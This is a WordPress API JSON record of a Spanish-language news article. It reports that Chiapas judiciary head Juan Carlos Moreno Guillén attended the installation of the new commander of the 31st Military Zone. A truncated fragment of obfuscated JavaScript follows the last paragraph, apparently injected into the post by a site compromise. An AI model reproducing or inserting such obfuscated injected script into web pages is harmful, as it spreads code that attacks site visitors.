{"id":21235,"date":"2025-04-03T02:30:44","date_gmt":"2025-04-03T02:30:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21235"},"modified":"2025-04-03T02:30:45","modified_gmt":"2025-04-03T02:30:45","slug":"atestigua-moreno-guillen-toma-de-protesta-del-nuevo-mando-de-la-31-zona-militar","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21235","title":{"rendered":"*Atestigua Moreno Guill\u00e9n toma de protesta del Nuevo Mando de la 31 Zona Militar"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250402-WA0028-1024x683.jpg\" alt=\"\" class=\"wp-image-21236\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250402-WA0028-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250402-WA0028-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250402-WA0028-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250402-WA0028-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250402-WA0028-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>2 de abril del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 junto al gobernador de Chiapas, Eduardo Ram\u00edrez Aguilar, a la Ceremonia de Toma de Posesi\u00f3n del nuevo comandante de la 31 Zona Militar, General de Brigada E. M. Juan Ignacio Hern\u00e1ndez Velasco, en las instalaciones del Campo Militar N\u00famero 31-C de Berrioz\u00e1bal.<\/p>\n\n\n\n<p>En esta ceremonia militar donde asistieron autoridades locales, estatales, federales y miembros del Batall\u00f3n, luego de rendir la Protesta de Posesi\u00f3n del mando, se realiz\u00f3 tambi\u00e9n la Protesta de Bandera y el Pase de Lista correspondiente, ante el General de Brigada Diplomado Estado Mayor.<\/p>\n\n\n\n<p>Moreno Guill\u00e9n asever\u00f3 que la suma de esfuerzos con las Fuerzas Armadas y con el gobierno federal, bajo la direcci\u00f3n de la presidenta de la Rep\u00fablica, Claudia Sheinbaum, fortalecen la unidad nacional y las acciones en materia de paz y justicia en nuestra entidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 2 de abril del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, asisti\u00f3 junto al gobernador de Chiapas, Eduardo Ram\u00edrez Aguilar, a la Ceremonia de Toma de Posesi\u00f3n del nuevo comandante de la 31 Zona Militar, General de Brigada E. M. Juan Ignacio Hern\u00e1ndez Velasco, en las instalaciones del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21236,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21235","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21235","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21235"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21235\/revisions"}],"predecessor-version":[{"id":21237,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21235\/revisions\/21237"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21236"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21235"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}